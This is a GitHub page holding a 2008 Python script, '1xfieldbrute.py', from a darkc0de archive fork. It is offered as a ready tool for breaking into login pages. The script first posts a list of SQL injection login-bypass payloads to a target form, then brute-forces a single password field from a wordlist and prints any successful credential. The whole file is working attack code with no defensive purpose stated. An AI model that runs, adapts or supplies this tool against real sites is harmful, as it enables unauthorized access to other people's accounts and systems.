forked from tuwid/darkc0de-old-stuff
-
Notifications
You must be signed in to change notification settings - Fork 7
/
1xfieldbrute.py
168 lines (126 loc) · 4.86 KB
/
1xfieldbrute.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
#!usr/bin/python
#############################################
## 1 X FIELD BRUTE v 1.0 ##
#############################################
# #
# 25/08/2008 #
# This script brute forces login pages with #
# only one login credential, such as a pass #
# word. I built this script because I could #
# not find a program that would do this for #
# me. This is my first ever program, so be #
# nice, there will be plenty more to come. #
# #
#############################################
# RaZtA #
#############################################
# www.darkc0de.com #
#############################################
# Import system shit
import sys, re, urllib, urllib2, socket, time, httplib, cookielib, threading
# Set socket timeout in seconds
socket.setdefaulttimeout(10)
# Hello World
if len(sys.argv) <= 1:
print
print "Usage: ./1xfieldbrute.py http://www.site.com/login.php password words.txt"
print "Type -help for more detailed information\n"
sys.exit(1)
# Help screen
for arg in sys.argv:
if arg == "-help":
print "----------------------------------------------------------------------------"
print "1xFieldBrute v1.0 - RaZtA"
print "----------------------------------------------------------------------------"
print "Usage: ./1xfieldbrute.py http://www.site.com/login.php password wordlist.txt"
print
print "All fields are required!"
print "1st argument: URL Eg: http://www.site.com/login.php"
print "2nd argument: Post parameter Eg: password"
print "3rd argument Wordlist Eg: words.txt"
print "-help This help screen"
print
print "If you are receiving false positives, change the identifier variable"
print "within the source code. Default = Password:"
print
sys.exit(1)
# Input variables
host = sys.argv[1]
param = sys.argv[2]
wordl = sys.argv[3]
# Other variables - (identifier - identifies wether a login is successful or not)
identifier = "Password:"
# Some output to reassure user
print
print "---------------------------------------------------------------------------"
print "[-] 1xFieldBrute v1.0 - RaZtA"
print "[+] Host:", host
print "[+] Post:", param
# Open wordlist
try:
words = open(sys.argv[3], "r").readlines()
print "[+] Words Loaded:",len(words)
print "---------------------------------------------------------------------------"
print "[+] Starting to crack... Good luck!\n"
print
except(IOError):
print "[!] Error: Check your wordlist path\n"
sys.exit(1)
# Try SQL injection login bypass first
sqlis = ["hi' or 1=1","hi' or 1=1--","a' or 't'='t","'OR'",'" or 1=1--',"or 1=1--","' or 'a'='a",'" or "a"="a',"') or ('a'='a","admin'--","admin' # ","admin'/*","' or 1=1#","' or 1=1/*","'or user_id=2/*"]
print "[-] Will try and bypass login with SQL injection first.\n"
for sqli in sqlis:
login_form_seq = [(param, sqli),('submit', 'submit')]
login_form_data = urllib.urlencode(login_form_seq)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
opener.addheaders = [('Referer', host)]
site = opener.open(host, login_form_data).read()
print "[+] Trying:", sqli
except(urllib2.URLError), msg:
print "[!] Error:", msg, "- Check the URL\n"
site = ""
sys.exit(1)
# Read SQL injection response
if re.search(param, site) == None:
print "\n\t[!] Error: Post parameter [",param,"] not found, please check and try again"
print
sys.exit(1)
if re.search(identifier,site) == None:
print "\n\t[+] Login Successful:",sqli,"\n"
print
sys.exit(1)
# Turn wordlist into an array and set POST variables, if more POST variables need to be amended,
# add them to the login_form_seq array.
print
print "[-] Now moving on to the wordlist\n"
for word in words:
word = word.replace("\r","").replace("\n","")
login_form_seq = [(param, word),('submit', 'submit')]
# Send POST data and declare additional headers to be sent, including cookies.
login_form_data = urllib.urlencode(login_form_seq)
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
try:
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
opener.addheaders = [('Referer', host)]
site = opener.open(host, login_form_data).read()
print "[+] Trying:", word
except(urllib2.URLError), msg:
print "[!] Error:", msg, "- Check the URL\n"
site = ""
sys.exit(1)
# Read wordlist response
if re.search(param, site) == None:
print "\n\t[!] Error: Post parameter [",param,"] not found, please check and try again"
print
sys.exit(1)
if re.search(identifier,site) == None:
print "\n\t[+] Login Successful:",word,"\n"
print
sys.exit(1)
# Output if password not found
print "\n[-] No password found"
print